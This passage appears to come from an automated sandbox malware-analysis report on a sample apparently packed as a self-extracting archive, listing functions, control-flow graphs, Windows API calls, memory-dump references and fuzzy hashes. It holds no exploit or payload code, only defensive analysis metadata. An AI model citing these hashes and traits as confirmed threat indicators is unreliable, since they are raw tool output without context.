        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Message$Send$Window$CallbackDestroyDialogDispatchDispatcherItemPeekShowTranslateUser
        • String ID: \
        • API String ID: 3039329835-2967466578
        • Opcode ID: 7a600e38a4ccd51d90d0c366d707b5c20ed2d1fc1675372ca76fe0e4dd94b201
        • Instruction ID: e10cd5f0a89f6b57d0514f015c53e1eeb6b043f84e061482e663cbac75ba9855
        • Opcode Fuzzy Hash: 7a600e38a4ccd51d90d0c366d707b5c20ed2d1fc1675372ca76fe0e4dd94b201
        • Instruction Fuzzy Hash: 8431E171185B40BFD301DF209C0EFAB3FADFF42B04F440908F5A1A6190C7A54A488BA6
        Function 0014BB0B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 725 14bb0b-14bb24 726 14bb26-14bb36 call 1500fc 725->726 727 14bb3a-14bb3f 725->727 726->727 734 14bb38 726->734 729 14bb41-14bb49 727->729 730 14bb4c-14bb70 MultiByteToWideChar 727->730 729->730 732 14bb76-14bb82 730->732 733 14bd03-14bd16 call 140d6c 730->733 735 14bb84-14bb95 732->735 736 14bbd6 732->736 734->727 739 14bbb4-14bbc5 call 14a7ee 735->739 740 14bb97-14bba6 call 1531c0 735->740 738 14bbd8-14bbda 736->738 742 14bbe0-14bbf3 MultiByteToWideChar 738->742 743 14bcf8 738->743 739->743 753 14bbcb 739->753 740->743 752 14bbac-14bbb2 740->752 742->743 746 14bbf9-14bc0b call 14c11c 742->746 747 14bcfa-14bd01 call 14bd73 743->747 755 14bc10-14bc14 746->755 747->733 754 14bbd1-14bbd4 752->754 753->754 754->738 755->743 757 14bc1a-14bc21 755->757 758 14bc23-14bc28 757->758 759 14bc5b-14bc67 757->759 758->747 760 14bc2e-14bc30 758->760 761 14bcb3 759->761 762 14bc69-14bc7a 759->762 760->743 765 14bc36-14bc50 call 14c11c 760->765 766 14bcb5-14bcb7 761->766 763 14bc95-14bca6 call 14a7ee 762->763 764 14bc7c-14bc8b call 1531c0 762->764 770 14bcf1-14bcf7 call 14bd73 763->770 779 14bca8 763->779 764->770 777 14bc8d-14bc93 764->777 765->747 780 14bc56 765->780 766->770 771 14bcb9-14bcd2 call 14c11c 766->771 770->743 771->770 783 14bcd4-14bcdb 771->783 782 14bcae-14bcb1 777->782 779->782 780->743 782->766 784 14bd17-14bd1d 783->784 785 14bcdd-14bcde 783->785 786 14bcdf-14bcef WideCharToMultiByte 784->786 785->786 786->770 787 14bd1f-14bd26 call 14bd73 786->787 787->747
        APIs
        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00146993,00146993,?,?,?,0014BD5C,00000001,00000001,62E85006), ref: 0014BB65
        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0014BD5C,00000001,00000001,62E85006,?,?,?), ref: 0014BBEB
        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0014BCE5
        • __freea.LIBCMT ref: 0014BCF2
          • Part of subcall function 0014A7EE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0014DBDC,00000000,?,001480A1,?,00000008,?,0014A861,?,?,?), ref: 0014A820
        • __freea.LIBCMT ref: 0014BCFB
        • __freea.LIBCMT ref: 0014BD20
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ByteCharMultiWide__freea$AllocateHeap
        • String ID:
        • API String ID: 1414292761-0
        • Opcode ID: 5aa50522b704c5e63c9a6aafba6f976059b5bd8f528748a7bcc469b81b97e806
        • Instruction ID: 400dce5f92088de6fa179eed6d9df24537827cb561285102e616565c165b80ff
        • Opcode Fuzzy Hash: 5aa50522b704c5e63c9a6aafba6f976059b5bd8f528748a7bcc469b81b97e806
        • Instruction Fuzzy Hash: D551F172604216ABDB258F64CCC2EBF77A9EB54750F254668FC14DB1A0EF34DC80C690
        Function 0013BBB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 790 13bbb0-13bbcf GetClassNameW 791 13bbd1-13bbe6 call 133306 790->791 792 13bbf7-13bbf9 790->792 797 13bbf6 791->797 798 13bbe8-13bbf4 FindWindowExW 791->798 794 13bc04-13bc06 792->794 795 13bbfb-13bbfd 792->795 795->794 797->792 798->797
        APIs
        • GetClassNameW.USER32(?,?,00000050), ref: 0013BBC7
        • SHAutoComplete.SHLWAPI(?,00000010), ref: 0013BBFE
          • Part of subcall function 00133306: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013306,0012D523,00000000,.exe,?,?,00000800,?,?,?,00139E4C), ref: 0013331C
        • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0013BBEE
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AutoClassCompareCompleteFindNameStringWindow
        • String ID: @UJu$EDIT
        • API String ID: 4243998846-1013725496
        • Opcode ID: 5ae77079d9a29680c17f25f190ce4e0b8378e149ed8884f1c869e07544256985
        • Instruction ID: ea588412cd20dca2e42c86ad0201d5849c72d4afc6cd74437573140df9c637ca
        • Opcode Fuzzy Hash: 5ae77079d9a29680c17f25f190ce4e0b8378e149ed8884f1c869e07544256985
        • Instruction Fuzzy Hash: C8F08232604628BBDB3056259C09F9FBA6CEB46B40F440051BA01B6184EB60EA45C6BA
        Function 0012AB40 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 799 12ab40-12ab61 call 13ffc0 802 12ab63-12ab66 799->802 803 12ab6c 799->803 802->803 804 12ab68-12ab6a 802->804 805 12ab6e-12ab7f 803->805 804->805 806 12ab81 805->806 807 12ab87-12ab91 805->807 806->807 808 12ab93 807->808 809 12ab96-12aba3 call 1279e5 807->809 808->809 812 12aba5 809->812 813 12abab-12abca CreateFileW 809->813 812->813 814 12ac1b-12ac1f 813->814 815 12abcc-12abee GetLastError call 12cf32 813->815 817 12ac23-12ac26 814->817 819 12ac28-12ac2d 815->819 821 12abf0-12ac13 CreateFileW GetLastError 815->821 817->819 820 12ac39-12ac3e 817->820 819->820 822 12ac2f 819->822 823 12ac40-12ac43 820->823 824 12ac5f-12ac70 820->824 821->817 827 12ac15-12ac19 821->827 822->820 823->824 828 12ac45-12ac59 SetFileTime 823->828 825 12ac72-12ac8a call 131928 824->825 826 12ac8e-12ac99 824->826 825->826 827->817 828->824
        APIs
        • CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00128243,?,00000005,?,00000011), ref: 0012ABBF
        • GetLastError.KERNEL32(?,?,00128243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0012ABCC
        • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00128243,?,00000005,?), ref: 0012AC02
        • GetLastError.KERNEL32(?,?,00128243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0012AC0A
        • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00128243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0012AC59
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: File$CreateErrorLast$Time
        • String ID:
        • API String ID: 1999340476-0
        • Opcode ID: 16fedeb8fb357680bd9ef4f044c7ad9a8bab4fd0cd64ed9f64704fa94c1160ec
        • Instruction ID: ec61dbad41a57f2acac5506fc792c281246d71ce09e5d204ca2e8eb9bb7620ae
        • Opcode Fuzzy Hash: 16fedeb8fb357680bd9ef4f044c7ad9a8bab4fd0cd64ed9f64704fa94c1160ec
        • Instruction Fuzzy Hash: 893166305447A1AFE7309F24EC45BDABBD4BF01324F600B19FAA0961D1C3B0A8A4CB92
        Function 00132206 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
        Download Yara Rule

        Control-flow Graph

        APIs
          • Part of subcall function 001324DF: ResetEvent.KERNEL32(?), ref: 001324F1
          • Part of subcall function 001324DF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00132505
        • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0013223A
        • CloseHandle.KERNEL32(?,?), ref: 00132254
        • DeleteCriticalSection.KERNEL32(?), ref: 0013226D
        • CloseHandle.KERNEL32(?), ref: 00132279
        • CloseHandle.KERNEL32(?), ref: 00132285
          • Part of subcall function 001322FC: WaitForSingleObject.KERNEL32(?,000000FF,00132516,?), ref: 00132302
          • Part of subcall function 001322FC: GetLastError.KERNEL32(?), ref: 0013230E
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
        • String ID:
        • API String ID: 1868215902-0
        • Opcode ID: 3ebbf83d7ff0a714e6bec5c1e791874cdc6efc7a2a475a49106100d0425a57ad
        • Instruction ID: 2b8b1209e505c349972a4fdbe649231ede06353a39268e2b85bfebb7819b79f1
        • Opcode Fuzzy Hash: 3ebbf83d7ff0a714e6bec5c1e791874cdc6efc7a2a475a49106100d0425a57ad
        • Instruction Fuzzy Hash: FD018472400744EFC732AF64DC85BC6BBA9FB08715F100929F26A525A0CB757A94DB90
        Function 0013C748 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 866 13c748-13c761 PeekMessageW 867 13c763-13c777 KiUserCallbackDispatcher 866->867 868 13c79c-13c79e 866->868 869 13c779-13c786 IsDialogMessageW 867->869 870 13c788-13c796 TranslateMessage DispatchMessageW 867->870 869->868 869->870 870->868
        APIs
        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0013C759
        • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0013C76A
        • IsDialogMessageW.USER32(00010424,?), ref: 0013C77E
        • TranslateMessage.USER32(?), ref: 0013C78C
        • DispatchMessageW.USER32(?), ref: 0013C796
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Message$CallbackDialogDispatchDispatcherPeekTranslateUser
        • String ID:
        • API String ID: 3531142305-0
        • Opcode ID: 44d1074cf950a72e965437171aa0b973774afe94c6bb63e21617cf6458af6286
        • Instruction ID: 64f01645660fe7e28d790657b815bc9103be1bd41426379c677856a1c3e40ed5
        • Opcode Fuzzy Hash: 44d1074cf950a72e965437171aa0b973774afe94c6bb63e21617cf6458af6286
        • Instruction Fuzzy Hash: BDF0D071901619ABCF209BB1DC4CDDB7F7CEF05391B404415B906E2450E764D645CBF0
        Function 0013BD0B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34comCOMMON
        Download Yara Rule

        Control-flow Graph

        APIs
          • Part of subcall function 00131B34: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00131B4F
          • Part of subcall function 00131B34: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00130633,Crypt32.dll,00000000,001306AD,00000200,?,00130690,00000000,00000000,?), ref: 00131B71
        • OleInitialize.OLE32(00000000), ref: 0013BD24
        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0013BD5B
        • SHGetMalloc.SHELL32(0016A460), ref: 0013BD65
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
        • String ID: riched20.dll
        • API String ID: 3498096277-3360196438
        • Opcode ID: a9bb05db861f2e8d52eae4499db5fb58515ab060260c3df754ef5ef2f27184b7
        • Instruction ID: 4b5e5db75afc4ff7b9f9724625f23ac4f0787cc771ee9f237bcd9fb137eed080
        • Opcode Fuzzy Hash: a9bb05db861f2e8d52eae4499db5fb58515ab060260c3df754ef5ef2f27184b7
        • Instruction Fuzzy Hash: CBF049B1C00209ABCB10AF99CC499EFFFFCEF94304F00401AE810A2240DBB456458BA1
        Function 0013ED1E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 875 13ed1e-13ed52 call 13ffc0 SetEnvironmentVariableW call 131697 880 13ed76-13ed78 875->880 881 13ed54-13ed58 875->881 882 13ed61-13ed68 call 1317b3 881->882 885 13ed5a-13ed60 882->885 886 13ed6a-13ed70 SetEnvironmentVariableW 882->886 885->882 886->880
        APIs
        • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0013ED34
        • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0013ED70
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: EnvironmentVariable
        • String ID: sfxcmd$sfxpar
        • API String ID: 1431749950-3493335439
        • Opcode ID: 7104179b8add53191e4bbc7f739772dd8be850104f1543569c0cfae0da36f034
        • Instruction ID: e838cbf3d60b25763136ffc972bd9d4d778142b9b117fc8be4e18e7bf06f3e7e
        • Opcode Fuzzy Hash: 7104179b8add53191e4bbc7f739772dd8be850104f1543569c0cfae0da36f034
        • Instruction Fuzzy Hash: 7BF030B2800734E7DB212BD08C46ABA7BA8AF65B86F444155BD859A092E77098C0CAA0
        Function 00144D92 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 887 144d92-144da7 LoadLibraryExW 888 144da9-144db2 GetLastError 887->888 889 144ddb-144ddc 887->889 890 144db4-144dc8 call 147458 888->890 891 144dd9 888->891 890->891 894 144dca-144dd8 LoadLibraryExW 890->894 891->889
        APIs
        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00144D43,00000000,?,001840C4,?,?,?,00144EE6,00000004,InitializeCriticalSectionEx,00157424,InitializeCriticalSectionEx), ref: 00144D9F
        • GetLastError.KERNEL32(?,00144D43,00000000,?,001840C4,?,?,?,00144EE6,00000004,InitializeCriticalSectionEx,00157424,InitializeCriticalSectionEx,00000000,?,00144C9D), ref: 00144DA9
        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00144DD1
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: LibraryLoad$ErrorLast
        • String ID: api-ms-
        • API String ID: 3177248105-2084034818
        • Opcode ID: 8b0008530d4e4213cc206743ca9f7601d5beedc7ffd7b17459aa214cfb877a36
        • Instruction ID: 513d34961bbac9907827bf25dbe1bc763f61646ea58a482dbf88131c1c03d84b
        • Opcode Fuzzy Hash: 8b0008530d4e4213cc206743ca9f7601d5beedc7ffd7b17459aa214cfb877a36
        • Instruction Fuzzy Hash: 82E04F74684308F7EF101BA1FC06B693F99AF20B66F140020FA4DAC8F0EB7299E19584
        Function 0012A9E5 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 895 12a9e5-12a9f1 896 12a9f3-12a9fb GetStdHandle 895->896 897 12a9fe-12aa15 ReadFile 895->897 896->897 898 12aa71 897->898 899 12aa17-12aa20 call 12ab1c 897->899 900 12aa74-12aa77 898->900 903 12aa22-12aa2a 899->903 904 12aa39-12aa3d 899->904 903->904 905 12aa2c 903->905 906 12aa4e-12aa52 904->906 907 12aa3f-12aa48 GetLastError 904->907 908 12aa2d-12aa37 call 12a9e5 905->908 910 12aa54-12aa5c 906->910 911 12aa6c-12aa6f 906->911 907->906 909 12aa4a-12aa4c 907->909 908->900 909->900 910->911 912 12aa5e-12aa67 GetLastError 910->912 911->900 912->911 914 12aa69-12aa6a 912->914 914->908
        APIs
        • GetStdHandle.KERNEL32(000000F6), ref: 0012A9F5
        • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0012AA0D
        • GetLastError.KERNEL32 ref: 0012AA3F
        • GetLastError.KERNEL32 ref: 0012AA5E
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ErrorLast$FileHandleRead
        • String ID:
        • API String ID: 2244327787-0
        • Opcode ID: bebfbb784db43d05ce05962919f72aa83392d6b29ca4d45aad8b3402b6d588d2
        • Instruction ID: cbc265af8fce23eddcf943b764b8f1b9eff475e6213be100f6ee498c507dda5f
        • Opcode Fuzzy Hash: bebfbb784db43d05ce05962919f72aa83392d6b29ca4d45aad8b3402b6d588d2
        • Instruction Fuzzy Hash: FB118231900224EBCF249F60FE046AE3BA9FF51365FA04626F91687190D7749EA4DB53
        Function 0014BEE4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0012EA30,00000000,00000000,?,0014BE8B,0012EA30,00000000,00000000,00000000,?,0014C088,00000006,FlsSetValue), ref: 0014BF16
        • GetLastError.KERNEL32(?,0014BE8B,0012EA30,00000000,00000000,00000000,?,0014C088,00000006,FlsSetValue,00158A00,FlsSetValue,00000000,00000364,?,0014A5D7), ref: 0014BF22
        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0014BE8B,0012EA30,00000000,00000000,00000000,?,0014C088,00000006,FlsSetValue,00158A00,FlsSetValue,00000000), ref: 0014BF30
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: LibraryLoad$ErrorLast
        • String ID:
        • API String ID: 3177248105-0
        • Opcode ID: 7b44e62d919ac5018b60d73c421ff4fe9c1cbcf67edf4f945635f53f10c7a06e
        • Instruction ID: 6f528fba2471adba168853545832b4ece917ff2179464ba56c1b8976f5d4c931
        • Opcode Fuzzy Hash: 7b44e62d919ac5018b60d73c421ff4fe9c1cbcf67edf4f945635f53f10c7a06e
        • Instruction Fuzzy Hash: ED012B3231A333DBC7218B78AC84A577798AF157B67220620F91ED75A0D730D889CEE0
        Function 0012B20A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
        Download Yara Rule
        APIs
        • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0012E79B,00000001,?,?,?,00000000,001366B2,?,?,?), ref: 0012B22E
        • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,001366B2,?,?,?,?,?,00136174,?), ref: 0012B275
        • WriteFile.KERNEL32(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0012E79B,00000001,?,?), ref: 0012B2A1
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: FileWrite$Handle
        • String ID:
        • API String ID: 4209713984-0
